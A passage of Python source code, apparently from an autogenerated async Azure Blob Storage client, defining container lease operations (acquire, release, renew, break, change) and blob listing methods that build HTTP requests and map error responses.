duration: Optional[int] = None,
proposed_lease_id: Optional[str] = None,
request_id_parameter: Optional[str] = None,
modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None,
**kwargs
) -> None:
"""[Update] establishes and manages a lock on a container for delete operations. The lock duration
can be 15 to 60 seconds, or can be infinite.
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param duration: Specifies the duration of the lease, in seconds, or negative one (-1) for a
lease that never expires. A non-infinite lease can be between 15 and 60 seconds. A lease
duration cannot be changed using renew or change.
:type duration: int
:param proposed_lease_id: Proposed lease ID, in a GUID string format. The Blob service returns
400 (Invalid request) if the proposed lease ID is not in the correct format. See Guid
Constructor (String) for a list of valid GUID string formats.
:type proposed_lease_id: str
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:param modified_access_conditions: Parameter group.
:type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_if_modified_since = None
_if_unmodified_since = None
if modified_access_conditions is not None:
_if_modified_since = modified_access_conditions.if_modified_since
_if_unmodified_since = modified_access_conditions.if_unmodified_since
comp = "lease"
restype = "container"
action = "acquire"
accept = "application/xml"
# Construct URL
url = self.acquire_lease.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['comp'] = self._serialize.query("comp", comp, 'str')
query_parameters['restype'] = self._serialize.query("restype", restype, 'str')
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['x-ms-lease-action'] = self._serialize.header("action", action, 'str')
if duration is not None:
header_parameters['x-ms-lease-duration'] = self._serialize.header("duration", duration, 'int')
if proposed_lease_id is not None:
header_parameters['x-ms-proposed-lease-id'] = self._serialize.header("proposed_lease_id", proposed_lease_id, 'str')
if _if_modified_since is not None:
header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
if _if_unmodified_since is not None:
header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", _if_unmodified_since, 'rfc-1123')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.put(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
response_headers['x-ms-lease-id']=self._deserialize('str', response.headers.get('x-ms-lease-id'))
response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
if cls:
return cls(pipeline_response, None, response_headers)
acquire_lease.metadata = {'url': '/{containerName}'} # type: ignore
async def release_lease(
    self,
    lease_id: str,
    timeout: Optional[int] = None,
    request_id_parameter: Optional[str] = None,
    modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None,
    **kwargs
) -> None:
    """[Update] establishes and manages a lock on a container for delete operations. The lock duration
    can be 15 to 60 seconds, or can be infinite.

    :param lease_id: Specifies the current lease ID on the resource.
    :type lease_id: str
    :param timeout: The timeout parameter is expressed in seconds. For more information, see
     :code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
     timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
    :type timeout: int
    :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
     limit that is recorded in the analytics logs when storage analytics logging is enabled.
    :type request_id_parameter: str
    :param modified_access_conditions: Parameter group.
    :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: None, or the result of cls(response)
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType[None]
    # Default mapping of HTTP failures to typed exceptions; callers may
    # extend it through the 'error_map' kwarg.
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))

    # Unpack the optional ModifiedAccessConditions parameter group.
    _if_modified_since = None
    _if_unmodified_since = None
    if modified_access_conditions is not None:
        _if_modified_since = modified_access_conditions.if_modified_since
        _if_unmodified_since = modified_access_conditions.if_unmodified_since

    # Wire constants identifying the lease 'release' operation.
    comp = "lease"
    restype = "container"
    action = "release"
    accept = "application/xml"

    # Build the request URL from the operation's URL template.
    url = self.release_lease.metadata['url']  # type: ignore
    path_args = {
        'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
    }
    url = self._client.format_url(url, **path_args)

    # Query string: operation selectors plus the optional server timeout.
    query_params = {
        'comp': self._serialize.query("comp", comp, 'str'),
        'restype': self._serialize.query("restype", restype, 'str'),
    }  # type: Dict[str, Any]
    if timeout is not None:
        query_params['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)

    # Request headers: lease action/id, conditional headers, versioning.
    headers = {
        'x-ms-lease-action': self._serialize.header("action", action, 'str'),
        'x-ms-lease-id': self._serialize.header("lease_id", lease_id, 'str'),
    }  # type: Dict[str, Any]
    if _if_modified_since is not None:
        headers['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
    if _if_unmodified_since is not None:
        headers['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", _if_unmodified_since, 'rfc-1123')
    headers['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
    if request_id_parameter is not None:
        headers['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
    headers['Accept'] = self._serialize.header("accept", accept, 'str')

    # Issue the PUT through the async pipeline.
    request = self._client.put(url, query_params, headers)
    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    # Release Lease succeeds with 200; anything else is surfaced as an error.
    if response.status_code != 200:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(_models.StorageError, response)
        raise HttpResponseError(response=response, model=error)

    # Deserialize the response headers of interest for the caller.
    response_headers = {
        'ETag': self._deserialize('str', response.headers.get('ETag')),
        'Last-Modified': self._deserialize('rfc-1123', response.headers.get('Last-Modified')),
        'x-ms-client-request-id': self._deserialize('str', response.headers.get('x-ms-client-request-id')),
        'x-ms-request-id': self._deserialize('str', response.headers.get('x-ms-request-id')),
        'x-ms-version': self._deserialize('str', response.headers.get('x-ms-version')),
        'Date': self._deserialize('rfc-1123', response.headers.get('Date')),
    }

    if cls:
        return cls(pipeline_response, None, response_headers)

release_lease.metadata = {'url': '/{containerName}'}  # type: ignore
async def renew_lease(
    self,
    lease_id: str,
    timeout: Optional[int] = None,
    request_id_parameter: Optional[str] = None,
    modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None,
    **kwargs
) -> None:
    """[Update] establishes and manages a lock on a container for delete operations. The lock duration
    can be 15 to 60 seconds, or can be infinite.

    :param lease_id: Specifies the current lease ID on the resource.
    :type lease_id: str
    :param timeout: The timeout parameter is expressed in seconds. For more information, see
     :code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
     timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
    :type timeout: int
    :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
     limit that is recorded in the analytics logs when storage analytics logging is enabled.
    :type request_id_parameter: str
    :param modified_access_conditions: Parameter group.
    :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: None, or the result of cls(response)
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType[None]
    # Default mapping of HTTP failures to typed exceptions; extensible via
    # the 'error_map' kwarg.
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))

    # Unpack the optional ModifiedAccessConditions parameter group.
    _if_modified_since = None
    _if_unmodified_since = None
    if modified_access_conditions is not None:
        _if_modified_since = modified_access_conditions.if_modified_since
        _if_unmodified_since = modified_access_conditions.if_unmodified_since

    # Wire constants identifying the lease 'renew' operation.
    comp = "lease"
    restype = "container"
    action = "renew"
    accept = "application/xml"

    # Construct URL
    url = self.renew_lease.metadata['url']  # type: ignore
    path_format_arguments = {
        'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}  # type: Dict[str, Any]
    query_parameters['comp'] = self._serialize.query("comp", comp, 'str')
    query_parameters['restype'] = self._serialize.query("restype", restype, 'str')
    if timeout is not None:
        query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)

    # Construct headers
    header_parameters = {}  # type: Dict[str, Any]
    header_parameters['x-ms-lease-action'] = self._serialize.header("action", action, 'str')
    header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", lease_id, 'str')
    if _if_modified_since is not None:
        header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
    if _if_unmodified_since is not None:
        header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", _if_unmodified_since, 'rfc-1123')
    header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
    if request_id_parameter is not None:
        header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    # Issue the PUT through the async pipeline.
    request = self._client.put(url, query_parameters, header_parameters)
    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    # Renew Lease succeeds with 200; anything else is surfaced as an error.
    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(_models.StorageError, response)
        raise HttpResponseError(response=response, model=error)

    # Deserialize the response headers of interest for the caller.
    response_headers = {}
    response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
    response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
    response_headers['x-ms-lease-id']=self._deserialize('str', response.headers.get('x-ms-lease-id'))
    response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
    response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
    response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
    response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))

    if cls:
        return cls(pipeline_response, None, response_headers)

renew_lease.metadata = {'url': '/{containerName}'}  # type: ignore
async def break_lease(
    self,
    timeout: Optional[int] = None,
    break_period: Optional[int] = None,
    request_id_parameter: Optional[str] = None,
    modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None,
    **kwargs
) -> None:
    """[Update] establishes and manages a lock on a container for delete operations. The lock duration
    can be 15 to 60 seconds, or can be infinite.

    :param timeout: The timeout parameter is expressed in seconds. For more information, see
     :code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
     timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
    :type timeout: int
    :param break_period: For a break operation, proposed duration the lease should continue before
     it is broken, in seconds, between 0 and 60. This break period is only used if it is shorter
     than the time remaining on the lease. If longer, the time remaining on the lease is used. A new
     lease will not be available before the break period has expired, but the lease may be held for
     longer than the break period. If this header does not appear with a break operation, a fixed-
     duration lease breaks after the remaining lease period elapses, and an infinite lease breaks
     immediately.
    :type break_period: int
    :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
     limit that is recorded in the analytics logs when storage analytics logging is enabled.
    :type request_id_parameter: str
    :param modified_access_conditions: Parameter group.
    :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: None, or the result of cls(response)
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType[None]
    # Default mapping of HTTP failures to typed exceptions; extensible via
    # the 'error_map' kwarg.
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))

    # Unpack the optional ModifiedAccessConditions parameter group.
    _if_modified_since = None
    _if_unmodified_since = None
    if modified_access_conditions is not None:
        _if_modified_since = modified_access_conditions.if_modified_since
        _if_unmodified_since = modified_access_conditions.if_unmodified_since

    # Wire constants identifying the lease 'break' operation. Note: break
    # takes no lease id; it operates on whatever lease currently exists.
    comp = "lease"
    restype = "container"
    action = "break"
    accept = "application/xml"

    # Construct URL
    url = self.break_lease.metadata['url']  # type: ignore
    path_format_arguments = {
        'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}  # type: Dict[str, Any]
    query_parameters['comp'] = self._serialize.query("comp", comp, 'str')
    query_parameters['restype'] = self._serialize.query("restype", restype, 'str')
    if timeout is not None:
        query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)

    # Construct headers
    header_parameters = {}  # type: Dict[str, Any]
    header_parameters['x-ms-lease-action'] = self._serialize.header("action", action, 'str')
    if break_period is not None:
        header_parameters['x-ms-lease-break-period'] = self._serialize.header("break_period", break_period, 'int')
    if _if_modified_since is not None:
        header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
    if _if_unmodified_since is not None:
        header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", _if_unmodified_since, 'rfc-1123')
    header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
    if request_id_parameter is not None:
        header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    # Issue the PUT through the async pipeline.
    request = self._client.put(url, query_parameters, header_parameters)
    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    # Break Lease succeeds with 202 Accepted; anything else is an error.
    if response.status_code not in [202]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(_models.StorageError, response)
        raise HttpResponseError(response=response, model=error)

    # Deserialize the response headers of interest; 'x-ms-lease-time' is the
    # remaining time (seconds) before the lease is fully broken.
    response_headers = {}
    response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
    response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
    response_headers['x-ms-lease-time']=self._deserialize('int', response.headers.get('x-ms-lease-time'))
    response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
    response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
    response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
    response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))

    if cls:
        return cls(pipeline_response, None, response_headers)

break_lease.metadata = {'url': '/{containerName}'}  # type: ignore
async def change_lease(
    self,
    lease_id: str,
    proposed_lease_id: str,
    timeout: Optional[int] = None,
    request_id_parameter: Optional[str] = None,
    modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None,
    **kwargs
) -> None:
    """[Update] establishes and manages a lock on a container for delete operations. The lock duration
    can be 15 to 60 seconds, or can be infinite.

    :param lease_id: Specifies the current lease ID on the resource.
    :type lease_id: str
    :param proposed_lease_id: Proposed lease ID, in a GUID string format. The Blob service returns
     400 (Invalid request) if the proposed lease ID is not in the correct format. See Guid
     Constructor (String) for a list of valid GUID string formats.
    :type proposed_lease_id: str
    :param timeout: The timeout parameter is expressed in seconds. For more information, see
     :code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
     timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
    :type timeout: int
    :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
     limit that is recorded in the analytics logs when storage analytics logging is enabled.
    :type request_id_parameter: str
    :param modified_access_conditions: Parameter group.
    :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: None, or the result of cls(response)
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType[None]
    # Default mapping of HTTP failures to typed exceptions; extensible via
    # the 'error_map' kwarg.
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))

    # Unpack the optional ModifiedAccessConditions parameter group.
    _if_modified_since = None
    _if_unmodified_since = None
    if modified_access_conditions is not None:
        _if_modified_since = modified_access_conditions.if_modified_since
        _if_unmodified_since = modified_access_conditions.if_unmodified_since

    # Wire constants identifying the lease 'change' operation.
    comp = "lease"
    restype = "container"
    action = "change"
    accept = "application/xml"

    # Construct URL
    url = self.change_lease.metadata['url']  # type: ignore
    path_format_arguments = {
        'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}  # type: Dict[str, Any]
    query_parameters['comp'] = self._serialize.query("comp", comp, 'str')
    query_parameters['restype'] = self._serialize.query("restype", restype, 'str')
    if timeout is not None:
        query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)

    # Construct headers: change requires both the current and the proposed
    # lease ids.
    header_parameters = {}  # type: Dict[str, Any]
    header_parameters['x-ms-lease-action'] = self._serialize.header("action", action, 'str')
    header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", lease_id, 'str')
    header_parameters['x-ms-proposed-lease-id'] = self._serialize.header("proposed_lease_id", proposed_lease_id, 'str')
    if _if_modified_since is not None:
        header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
    if _if_unmodified_since is not None:
        header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", _if_unmodified_since, 'rfc-1123')
    header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
    if request_id_parameter is not None:
        header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    # Issue the PUT through the async pipeline.
    request = self._client.put(url, query_parameters, header_parameters)
    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    # Change Lease succeeds with 200; anything else is surfaced as an error.
    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(_models.StorageError, response)
        raise HttpResponseError(response=response, model=error)

    # Deserialize the response headers of interest for the caller.
    response_headers = {}
    response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
    response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
    response_headers['x-ms-lease-id']=self._deserialize('str', response.headers.get('x-ms-lease-id'))
    response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
    response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
    response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
    response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))

    if cls:
        return cls(pipeline_response, None, response_headers)

change_lease.metadata = {'url': '/{containerName}'}  # type: ignore
async def list_blob_flat_segment(
    self,
    prefix: Optional[str] = None,
    marker: Optional[str] = None,
    maxresults: Optional[int] = None,
    include: Optional[List[Union[str, "_models.ListBlobsIncludeItem"]]] = None,
    timeout: Optional[int] = None,
    request_id_parameter: Optional[str] = None,
    **kwargs
) -> "_models.ListBlobsFlatSegmentResponse":
    """[Update] The List Blobs operation returns a list of the blobs under the specified container.

    :param prefix: Filters the results to return only containers whose name begins with the
     specified prefix.
    :type prefix: str
    :param marker: A string value that identifies the portion of the list of containers to be
     returned with the next listing operation. The operation returns the NextMarker value within the
     response body if the listing operation did not return all containers remaining to be listed
     with the current page. The NextMarker value can be used as the value for the marker parameter
     in a subsequent call to request the next page of list items. The marker value is opaque to the
     client.
    :type marker: str
    :param maxresults: Specifies the maximum number of containers to return. If the request does
     not specify maxresults, or specifies a value greater than 5000, the server will return up to
     5000 items. Note that if the listing operation crosses a partition boundary, then the service
     will return a continuation token for retrieving the remainder of the results. For this reason,
     it is possible that the service will return fewer results than specified by maxresults, or than
     the default of 5000.
    :type maxresults: int
    :param include: Include this parameter to specify one or more datasets to include in the
     response.
    :type include: list[str or ~azure.storage.blob.models.ListBlobsIncludeItem]
    :param timeout: The timeout parameter is expressed in seconds. For more information, see
     :code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
     timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
    :type timeout: int
    :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
     limit that is recorded in the analytics logs when storage analytics logging is enabled.
    :type request_id_parameter: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: ListBlobsFlatSegmentResponse, or the result of cls(response)
    :rtype: ~azure.storage.blob.models.ListBlobsFlatSegmentResponse
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["_models.ListBlobsFlatSegmentResponse"]
    # Default mapping of HTTP failures to typed exceptions; extensible via
    # the 'error_map' kwarg.
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))

    # Wire constants identifying the container 'list' operation.
    restype = "container"
    comp = "list"
    accept = "application/xml"

    # Construct URL
    url = self.list_blob_flat_segment.metadata['url']  # type: ignore
    path_format_arguments = {
        'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters; 'include' is serialized as a comma-separated list.
    query_parameters = {}  # type: Dict[str, Any]
    query_parameters['restype'] = self._serialize.query("restype", restype, 'str')
    query_parameters['comp'] = self._serialize.query("comp", comp, 'str')
    if prefix is not None:
        query_parameters['prefix'] = self._serialize.query("prefix", prefix, 'str')
    if marker is not None:
        query_parameters['marker'] = self._serialize.query("marker", marker, 'str')
    if maxresults is not None:
        query_parameters['maxresults'] = self._serialize.query("maxresults", maxresults, 'int', minimum=1)
    if include is not None:
        query_parameters['include'] = self._serialize.query("include", include, '[str]', div=',')
    if timeout is not None:
        query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)

    # Construct headers
    header_parameters = {}  # type: Dict[str, Any]
    header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
    if request_id_parameter is not None:
        header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    # Issue the GET through the async pipeline.
    request = self._client.get(url, query_parameters, header_parameters)
    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    # List Blobs succeeds with 200; anything else is surfaced as an error.
    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(_models.StorageError, response)
        raise HttpResponseError(response=response, model=error)

    # Deserialize the response headers of interest for the caller.
    response_headers = {}
    response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type'))
    response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
    response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
    response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
    response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))

    # Deserialize the XML body into the typed listing model.
    deserialized = self._deserialize('ListBlobsFlatSegmentResponse', pipeline_response)

    if cls:
        return cls(pipeline_response, deserialized, response_headers)

    return deserialized

list_blob_flat_segment.metadata = {'url': '/{containerName}'}  # type: ignore
async def list_blob_hierarchy_segment(
    self,
    delimiter: str,
    prefix: Optional[str] = None,
    marker: Optional[str] = None,
    maxresults: Optional[int] = None,
    include: Optional[List[Union[str, "_models.ListBlobsIncludeItem"]]] = None,
    timeout: Optional[int] = None,
    request_id_parameter: Optional[str] = None,
    **kwargs
) -> "_models.ListBlobsHierarchySegmentResponse":
    """[Update] The List Blobs operation returns a list of the blobs under the specified container.

    :param delimiter: When the request includes this parameter, the operation returns a BlobPrefix
     element in the response body that acts as a placeholder for all blobs whose names begin with
     the same substring up to the appearance of the delimiter character. The delimiter may be a
     single character or a string.
    :type delimiter: str
    :param prefix: Filters the results to return only containers whose name begins with the
     specified prefix.
    :type prefix: str
    :param marker: A string value that identifies the portion of the list of containers to be
     returned with the next listing operation. The operation returns the NextMarker value within the
     response body if the listing operation did not return all containers remaining to be listed
     with the current page. The NextMarker value can be used as the value for the marker parameter
     in a subsequent call to request the next page of list items. The marker value is opaque to the
     client.
    :type marker: str
    :param maxresults: Specifies the maximum number of containers to return. If the request does
     not specify maxresults, or specifies a value greater than 5000, the server will return up to
     5000 items. Note that if the listing operation crosses a partition boundary, then the service
     will return a continuation token for retrieving the remainder of the results. For this reason,
     it is possible that the service will return fewer results than specified by maxresults, or than
     the default of 5000.
    :type maxresults: int
    :param include: Include this parameter to specify one or more datasets to include in the
     response.
    :type include: list[str or ~azure.storage.blob.models.ListBlobsIncludeItem]
    :param timeout: The timeout parameter is expressed in seconds. For more information, see
     :code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
     timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
    :type timeout: int
    :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
     limit that is recorded in the analytics logs when storage analytics logging is enabled.
    :type request_id_parameter: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: ListBlobsHierarchySegmentResponse, or the result of cls(response)
    :rtype: ~azure.storage.blob.models.ListBlobsHierarchySegmentResponse
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["_models.ListBlobsHierarchySegmentResponse"]
    # Default mapping of HTTP failures to typed exceptions; extensible via
    # the 'error_map' kwarg.
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))

    # Wire constants identifying the container 'list' operation.
    restype = "container"
    comp = "list"
    accept = "application/xml"

    # Construct URL
    url = self.list_blob_hierarchy_segment.metadata['url']  # type: ignore
    path_format_arguments = {
        'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters; the required 'delimiter' is what switches the
    # service into hierarchical (BlobPrefix) listing mode.
    query_parameters = {}  # type: Dict[str, Any]
    query_parameters['restype'] = self._serialize.query("restype", restype, 'str')
    query_parameters['comp'] = self._serialize.query("comp", comp, 'str')
    if prefix is not None:
        query_parameters['prefix'] = self._serialize.query("prefix", prefix, 'str')
    query_parameters['delimiter'] = self._serialize.query("delimiter", delimiter, 'str')
    if marker is not None:
        query_parameters['marker'] = self._serialize.query("marker", marker, 'str')
    if maxresults is not None:
        query_parameters['maxresults'] = self._serialize.query("maxresults", maxresults, 'int', minimum=1)
    if include is not None:
        query_parameters['include'] = self._serialize.query("include", include, '[str]', div=',')
    if timeout is not None:
        query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)

    # Construct headers
    header_parameters = {}  # type: Dict[str, Any]
    header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
    if request_id_parameter is not None:
        header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    # Issue the GET through the async pipeline.
    request = self._client.get(url, query_parameters, header_parameters)
    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    # List Blobs succeeds with 200; anything else is surfaced as an error.
    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(_models.StorageError, response)
